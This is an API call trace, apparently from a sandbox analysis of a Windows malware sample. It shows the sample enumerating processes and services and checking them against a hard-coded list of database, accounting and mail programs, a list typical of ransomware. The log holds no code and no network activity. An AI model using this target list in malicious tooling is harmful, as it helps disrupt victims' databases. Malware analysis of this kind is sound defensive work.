	[0160.133] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0160.133] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0160.133] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0160.133] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0160.133] lstrlenW (lpString="UxSms") returned 5
	[0160.133] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0160.133] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0160.133] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0160.133] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0160.134] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0160.134] lstrlenW (lpString="WdiServiceHost") returned 14
	[0160.134] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0160.134] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0160.134] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0160.134] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0160.134] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0160.134] lstrlenW (lpString="Winmgmt") returned 7
	[0160.134] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0160.134] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0160.134] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0160.134] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0160.134] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0160.134] lstrlenW (lpString="WPDBusEnum") returned 10
	[0160.134] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0160.134] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0160.134] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0160.134] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0160.134] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0160.134] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7ba9698 | out: hHeap=0x7ab0000) returned 1
	[0160.134] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3d8
	[0160.136] Process32FirstW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0160.136] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0160.136] lstrlenW (lpString="System") returned 6
	[0160.136] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0160.136] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0160.136] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0160.137] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0160.137] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0160.137] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0160.137] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0160.137] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0160.137] lstrlenW (lpString="smss.exe") returned 8
	[0160.137] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0160.137] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0160.137] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0160.137] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0160.137] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0160.137] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0160.137] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0160.137] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0160.138] lstrlenW (lpString="csrss.exe") returned 9
	[0160.138] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0160.138] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0160.138] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0160.138] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0160.138] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0160.138] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0160.138] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0160.138] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0160.138] lstrlenW (lpString="wininit.exe") returned 11
	[0160.138] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0160.138] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0160.138] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0160.138] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0160.138] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0160.138] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0160.138] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0160.138] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0160.139] lstrlenW (lpString="csrss.exe") returned 9
	[0160.139] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0160.139] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0160.139] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0160.139] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0160.139] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0160.139] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0160.139] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0160.139] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0160.139] lstrlenW (lpString="winlogon.exe") returned 12
	[0160.139] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0160.139] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0160.139] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0160.139] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0160.139] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0160.139] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0160.139] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0160.139] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0160.140] lstrlenW (lpString="services.exe") returned 12
	[0160.140] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0160.140] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0160.140] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0160.140] lstrlenW (lpString="lsass.exe") returned 9
	[0160.140] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0160.141] lstrlenW (lpString="lsm.exe") returned 7
	[0160.141] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0160.141] lstrlenW (lpString="svchost.exe") returned 11
	[0160.141] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0160.141] lstrlenW (lpString="svchost.exe") returned 11
	[0160.142] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0160.142] lstrlenW (lpString="svchost.exe") returned 11
	[0160.142] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0160.142] lstrlenW (lpString="svchost.exe") returned 11
	[0160.142] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0160.142] lstrlenW (lpString="svchost.exe") returned 11
	[0160.142] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0160.143] lstrlenW (lpString="audiodg.exe") returned 11
	[0160.143] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0160.143] lstrlenW (lpString="svchost.exe") returned 11
	[0160.143] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0160.143] lstrlenW (lpString="svchost.exe") returned 11
	[0160.143] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0160.144] lstrlenW (lpString="spoolsv.exe") returned 11
	[0160.144] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0160.144] lstrlenW (lpString="svchost.exe") returned 11
	[0160.144] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0160.144] lstrlenW (lpString="taskhost.exe") returned 12
	[0160.144] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0160.145] lstrlenW (lpString="userinit.exe") returned 12
	[0160.145] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0160.145] lstrlenW (lpString="dwm.exe") returned 7
	[0160.145] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0160.145] lstrlenW (lpString="explorer.exe") returned 12
	[0160.145] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0160.146] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0160.146] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0160.146] lstrlenW (lpString="reader_sl.exe") returned 13
	[0160.146] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="drvinst.exe")) returned 1
	[0160.146] lstrlenW (lpString="drvinst.exe") returned 11
	[0160.146] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="drvinst.exe")) returned 0
	[0160.147] CloseHandle (hObject=0x3d8) returned 1
	[0160.147] Sleep (dwMilliseconds=0x1f4) 
	[0160.879] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616c60
	[0160.879] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0160.880] GetLastError () returned 0xea
	[0160.880] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x113e) returned 0x7ba6360
	[0160.880] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7ba6360, cbBufSize=0x113e, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7ba6360, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0160.881] CloseServiceHandle (hSCObject=0xb616c60) returned 1
	[0160.881] lstrlenW (lpString="Appinfo") returned 7
	[0160.881] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0160.881] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0160.881] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0160.881] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0160.881] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0160.881] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0160.881] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0160.881] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0160.881] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0160.881] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0160.881] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0160.881] lstrlenW (lpString="AudioSrv") returned 8
	[0160.881] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0160.881] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0160.881] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0160.882] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0160.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0160.882] lstrlenW (lpString="BFE") returned 3
	[0160.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0160.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0160.882] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0160.882] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0160.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0160.882] lstrlenW (lpString="CryptSvc") returned 8
	[0160.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0160.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0160.882] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0160.882] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0160.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0160.882] lstrlenW (lpString="CscService") returned 10
	[0160.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0160.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0160.882] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0160.882] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0160.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0160.882] lstrlenW (lpString="DcomLaunch") returned 10
	[0160.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0160.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0160.882] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0160.882] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0160.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0160.882] lstrlenW (lpString="Dhcp") returned 4
	[0160.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0160.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0160.882] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0160.882] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0160.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0160.883] lstrlenW (lpString="Dnscache") returned 8
	[0160.883] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0160.883] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0160.883] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0160.883] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0160.883] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0160.883] lstrlenW (lpString="DPS") returned 3
	[0160.883] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0160.883] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0160.883] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0160.883] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0160.883] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0160.883] lstrlenW (lpString="eventlog") returned 8
	[0160.883] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0160.883] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0160.883] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0160.883] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0160.883] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0160.883] lstrlenW (lpString="EventSystem") returned 11
	[0160.883] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0160.883] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0160.883] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0160.883] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0160.883] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0160.883] lstrlenW (lpString="gpsvc") returned 5
	[0160.883] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0160.883] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0160.883] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0160.883] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0160.883] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0160.883] lstrlenW (lpString="iphlpsvc") returned 8
	[0160.884] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0160.884] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0160.884] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0160.884] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0160.884] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0160.884] lstrlenW (lpString="LanmanServer") returned 12
	[0160.884] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0160.884] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0160.884] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0160.884] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0160.884] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0160.884] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0160.884] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0160.884] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0160.884] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0160.884] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0160.884] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0160.884] lstrlenW (lpString="lmhosts") returned 7
	[0160.884] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0160.884] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0160.884] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0160.884] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0160.884] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0160.884] lstrlenW (lpString="MMCSS") returned 5
	[0160.884] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0160.884] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0160.884] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0160.884] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0160.884] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0160.884] lstrlenW (lpString="MpsSvc") returned 6
	[0160.884] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
